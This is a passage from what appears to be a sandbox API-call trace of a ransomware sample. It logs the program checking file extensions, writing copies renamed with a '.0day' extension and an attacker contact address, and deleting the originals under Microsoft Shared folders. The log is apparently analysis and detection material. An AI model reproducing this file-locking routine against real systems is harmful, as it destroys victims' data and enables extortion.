files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.999] lstrlenW (lpString=".doc") returned 4 [0053.999] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.999] lstrlenW (lpString=".docx") returned 5 [0053.999] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.999] lstrlenW (lpString=".pdf") returned 4 [0053.999] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.999] lstrlenW (lpString=".xls") returned 4 [0053.999] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.999] lstrlenW (lpString=".xlsx") returned 5 [0053.999] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.999] lstrlenW (lpString=".ppt") returned 4 [0053.999] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.999] lstrlenW (lpString=".zip") returned 4 [0053.999] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.999] lstrlenW (lpString=".rar") returned 4 [0053.999] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.999] lstrlenW (lpString=".bz2") returned 4 [0053.999] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.999] lstrlenW (lpString=".7z") returned 3 [0053.999] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.999] lstrlenW (lpString=".dbf") returned 4 [0053.999] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0053.999] lstrlenW (lpString=".1cd") returned 4 [0053.999] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString=".jpg") returned 4 [0054.000] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString=".doc") returned 4 [0054.000] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.000] lstrlenW (lpString=".docx") returned 5 [0054.000] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.000] lstrlenW (lpString=".pdf") returned 4 [0054.000] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.000] lstrlenW (lpString=".xls") returned 4 [0054.000] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.000] lstrlenW (lpString=".xlsx") returned 5 [0054.000] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.000] lstrlenW (lpString=".ppt") returned 4 [0054.000] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString=".zip") returned 4 [0054.000] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.000] lstrlenW (lpString=".rar") returned 4 [0054.000] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.000] lstrlenW (lpString=".bz2") returned 4 [0054.000] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.000] lstrlenW (lpString=".7z") returned 3 [0054.000] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString=".dbf") returned 4 [0054.000] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString=".1cd") returned 4 [0054.000] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0054.000] lstrlenW (lpString=".jpg") returned 4 [0054.001] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.001] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0054.001] lstrlenW (lpString="msitss55.dll") returned 12 [0054.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.110] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=430080) returned 1 [0055.110] CloseHandle (hObject=0x21c) returned 1 [0055.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 0x20 [0055.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0055.111] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.111] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0055.111] GetLastError () returned 0x0 [0055.111] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x69000, lpOverlapped=0x0) returned 1 [0055.120] WriteFile (in: hFile=0x238, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x69010, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x69010, lpOverlapped=0x0) returned 1 [0055.129] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.129] WriteFile (in: hFile=0x238, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.129] SetEndOfFile (hFile=0x238) returned 1 [0055.129] CloseHandle (hObject=0x238) returned 1 [0055.129] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.129] SetEndOfFile (hFile=0x21c) returned 1 [0055.133] CloseHandle (hObject=0x21c) returned 1 [0055.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.133] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 1 [0055.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.133] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.133] lstrlenW (lpString=".doc") returned 4 [0055.133] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.133] lstrlenW (lpString=".docx") returned 5 [0055.133] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0055.133] lstrlenW (lpString=".pdf") returned 4 [0055.133] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.133] lstrlenW (lpString=".xls") returned 4 [0055.133] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.133] lstrlenW (lpString=".xlsx") returned 5 [0055.134] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0055.134] lstrlenW (lpString=".ppt") returned 4 [0055.134] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.134] lstrlenW (lpString=".zip") returned 4 [0055.134] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString=".rar") returned 4 [0055.134] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString=".bz2") returned 4 [0055.134] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.134] lstrlenW (lpString=".7z") returned 3 [0055.134] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.134] lstrlenW (lpString=".dbf") returned 4 [0055.134] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.134] lstrlenW (lpString=".1cd") returned 4 [0055.134] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.134] lstrlenW (lpString=".jpg") returned 4 [0055.134] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.134] lstrlenW (lpString=".doc") returned 4 [0055.134] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString=".docx") returned 5 [0055.134] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0055.134] lstrlenW (lpString=".pdf") returned 4 [0055.134] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString=".xls") returned 4 [0055.134] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.134] lstrlenW (lpString=".xlsx") returned 5 [0055.134] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0055.135] lstrlenW (lpString=".ppt") returned 4 [0055.135] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.135] lstrlenW (lpString=".zip") returned 4 [0055.135] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.135] lstrlenW (lpString=".rar") returned 4 [0055.135] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.135] lstrlenW (lpString=".bz2") returned 4 [0055.135] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.135] lstrlenW (lpString=".7z") returned 3 [0055.135] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.135] lstrlenW (lpString=".dbf") returned 4 [0055.135] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.135] lstrlenW (lpString=".1cd") returned 4 [0055.135] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0055.135] lstrlenW (lpString=".jpg") returned 4 [0055.135] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.135] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.135] lstrlenW (lpString="IPSEventLogMsg.dll.mui") returned 22 [0055.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.751] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=22528) returned 1 [0055.751] CloseHandle (hObject=0x170) returned 1 [0055.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui")) returned 0x20 [0055.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.763] lstrlenW (lpString=".doc") returned 4 [0055.764] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.764] lstrlenW (lpString=".docx") returned 5 [0055.765] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.766] lstrlenW (lpString=".pdf") returned 4 [0055.767] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.768] lstrlenW (lpString=".xls") returned 4 [0055.769] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.769] lstrlenW (lpString=".xlsx") returned 5 [0055.769] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.770] lstrlenW (lpString=".ppt") returned 4 [0055.770] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.772] lstrlenW (lpString=".zip") returned 4 [0055.773] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.773] lstrlenW (lpString=".rar") returned 4 [0055.774] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.775] lstrlenW (lpString=".bz2") returned 4 [0055.776] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.776] lstrlenW (lpString=".7z") returned 3 [0055.777] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.778] lstrlenW (lpString=".dbf") returned 4 [0055.778] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.779] lstrlenW (lpString=".1cd") returned 4 [0055.780] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.782] lstrlenW (lpString=".jpg") returned 4 [0055.782] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.785] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.786] lstrlenW (lpString=".doc") returned 4 [0055.786] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.787] lstrlenW (lpString=".docx") returned 5 [0055.787] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.788] lstrlenW (lpString=".pdf") returned 4 [0055.789] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.790] lstrlenW (lpString=".xls") returned 4 [0055.790] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.791] lstrlenW (lpString=".xlsx") returned 5 [0055.792] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.793] lstrlenW (lpString=".ppt") returned 4 [0055.794] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.796] lstrlenW (lpString=".zip") returned 4 [0055.796] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.797] lstrlenW (lpString=".rar") returned 4 [0055.799] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.799] lstrlenW (lpString=".bz2") returned 4 [0055.800] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.801] lstrlenW (lpString=".7z") returned 3 [0055.804] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.805] lstrlenW (lpString=".dbf") returned 4 [0055.806] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.807] lstrlenW (lpString=".1cd") returned 4 [0055.807] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0055.809] lstrlenW (lpString=".jpg") returned 4 [0055.810] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.815] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.817] lstrlenW (lpString="mip.exe.mui") returned 11 [0055.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.825] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=10240) returned 1 [0055.825] CloseHandle (hObject=0x170) returned 1 [0055.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0x20 [0055.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.837] lstrlenW (lpString=".doc") returned 4 [0055.838] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.839] lstrlenW (lpString=".docx") returned 5 [0055.841] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0055.841] lstrlenW (lpString=".pdf") returned 4 [0055.841] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.842] lstrlenW (lpString=".xls") returned 4 [0055.842] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.843] lstrlenW (lpString=".xlsx") returned 5 [0055.844] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0055.845] lstrlenW (lpString=".ppt") returned 4 [0055.846] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.848] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.849] lstrlenW (lpString=".zip") returned 4 [0055.850] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.850] lstrlenW (lpString=".rar") returned 4 [0055.851] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.852] lstrlenW (lpString=".bz2") returned 4 [0055.853] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.854] lstrlenW (lpString=".7z") returned 3 [0055.855] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.858] lstrlenW (lpString=".dbf") returned 4 [0055.858] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.859] lstrlenW (lpString=".1cd") returned 4 [0055.860] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.861] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.862] lstrlenW (lpString=".jpg") returned 4 [0055.863] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.866] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.869] lstrlenW (lpString=".doc") returned 4 [0055.870] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.871] lstrlenW (lpString=".docx") returned 5 [0055.872] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0055.873] lstrlenW (lpString=".pdf") returned 4 [0055.874] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.875] lstrlenW (lpString=".xls") returned 4 [0055.876] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.878] lstrlenW (lpString=".xlsx") returned 5 [0055.879] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0055.879] lstrlenW (lpString=".ppt") returned 4 [0055.880] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.882] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.883] lstrlenW (lpString=".zip") returned 4 [0055.884] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.885] lstrlenW (lpString=".rar") returned 4 [0055.887] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.887] lstrlenW (lpString=".bz2") returned 4 [0055.888] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.888] lstrlenW (lpString=".7z") returned 3 [0055.889] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.890] lstrlenW (lpString=".dbf") returned 4 [0055.891] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.892] lstrlenW (lpString=".1cd") returned 4 [0055.893] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0055.896] lstrlenW (lpString=".jpg") returned 4 [0055.896] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.901] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0055.904] lstrlenW (lpString="mshwLatin.dll.mui") returned 17 [0055.904] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0055.920] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=2560) returned 1 [0055.921] CloseHandle (hObject=0x170) returned 1 [0055.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0x20 [0055.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 